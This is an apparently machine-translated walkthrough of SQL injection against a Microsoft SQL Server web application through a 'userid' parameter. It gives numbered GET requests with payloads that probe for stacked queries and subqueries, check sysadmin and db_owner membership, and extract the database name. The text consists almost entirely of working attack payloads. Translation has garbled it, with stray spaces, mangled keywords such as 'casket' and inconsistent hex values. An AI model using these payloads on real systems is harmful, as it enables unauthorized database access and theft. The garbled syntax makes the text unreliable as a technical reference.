According to the result of the captain 1.Get / radio /? Mode = user & userid = 3% 20and% 20User% 2bchar (124) = 0 http / 1.1 interpretation as / radio /? Mode = user & userid = 3 and user char (124) = 0 % 2B = char (124) = | 2.Get / Radio /? Mode = user & userid = 3; declare% 20 @ a% 20INT - HTTP / 1.1 Judging whether multiple queries are supported ./radio/?mode=User&userid= 3; DECLARE @a int - 3.get / radio /? Mode = user & userid = 3% 20and% 20 (select% 20count (1)% 20FROM% 20 [sysobjects])> = 0 http / 1.1 / radio /? Mode = User & userid = 3 and (select count (1) from [sysObjects])> = 0 Judgment whether the child query is supported 4. Get the current user 5.Get / radio /? mode = user & userid = 3% 20And% 20CAST (is_srvrolemember) 0x730079007300610064006D0069006E00)% 20as% 20varchar (1))% 2Bchar (124) / radio /? mode = user & userid = 3 And Cast (IS_SRVROLEMEMBER (0x730079007300610064006D0069006E00) as varchar (1)) char (124) = 1IS_SRVROLEMEMBER indicate the current user whether the login Is a member of the specified server role. IS_SRVROLEMEMBER ('role' [, 'login']) 6.GET / RADIO /? MODE = User & UserId = 3% 20And% 20cast (is_member (0x640062007200)% 20AS% 20Varchar (1))% 2bchar (124) = 1 / radio /? mode = user & userid = 3 and casket (is_member (0x640062005f006f0077006e0065007200) As varchar (1)) char (124) = 1 Judgment user rights 7.Get / radio /? mode = user & userid = 3% 20and% 20db_name ()% 2bchar (124) = 0 http / 1.1 / radio /? Mode = user & userid = 3 and db_name () char (124) = 0 Get the database name
